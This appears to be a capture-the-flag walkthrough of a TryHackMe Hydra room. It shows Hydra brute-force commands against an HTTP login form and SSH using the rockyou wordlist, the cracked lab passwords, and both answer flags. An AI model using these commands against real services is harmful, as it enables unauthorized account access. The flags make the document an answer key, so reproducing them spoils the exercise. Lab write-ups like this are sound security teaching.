Hydra (TryHackMe Walkthrough)
What is Hydra?
Hydra is a pre-installed tool in kali Linux. It is used to brute force an online password. We can use Hydra to run through a list and ‘brute-force some authentication service.
Hydra has the ability to brute-force the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Hydra Commands
The options we pass into Hydra depend on which service (protocol) we’re attacking. For example, if we wanted to brute-force FTP with the username being user and a password list being passlist.txt, we’d use the following command:
hydra -l user_name -P password_list.txt ftp://IP of the machine
For the purpose of this deployed machine, here are the commands to use Hydra on SSH and a web form (POST method).
SSH
hydra -l <username> -P <full path to pass> IP -t 4 ssh
Post Web Form
We can use Hydra to brute force web forms too, you will have to make sure you know which type of request its making — GET or POST methods are normally used. You can use your browser's network tab (in developer tools) to see the request types, or simply view the source code. Below is an example Hydra command to brute force a POST login form:
hydra -l <username> -P <wordlist> Machine’s IP http-post-form “/:username=^USER^&password=^PASS^:F=incorrect” -V
Use Hydra to brute force molly’s web password. What is flag 1?
In the terminal, input :
hydra -l molly -P /usr/share/wordlists/rockyou.txt Machine’s IP http-post-form “/login:username=^USER^&password=^PASS^:incorrect”
It tries all the passwords from rockyou.txt and shows the correct password which in our case is
[80][http-post-form] host: Machine’s IP login: molly password: sunshine
so use this password to log into the webpage that is in the Machine’s IP.
username: molly
Password: sunshine
there is the flag : THM{2673a7dd116de68e85c48ec0b1f2612e}
Use Hydra to bruteforce molly’s SSH password. What is flag 2?
Here you need to bruteforce the SSH password. So, try bruteforcing ssh password with following command:
hydra -l molly -P /usr/share/wordlists/rockyou.txt ssh://Machine’s IP
Now here you will again get a valid password in highlighted text
username : molly
Password : butterfly
Now, think for a while and you will get to a point that the flag must be in the machine so you must login via SSH. so login to the machine using SSH:
ssh molly@Machine’s IP
now type “Yes” if it asks you whether you want to continue.
Enter the password, i.e: butterfly
Now when you get logged in, try
ls
so there is a file flag2.txt
Now cat the file, i.e : cat flag2.txt
Ans : THM{c8eeb0468febbadea859baeb33b2541b}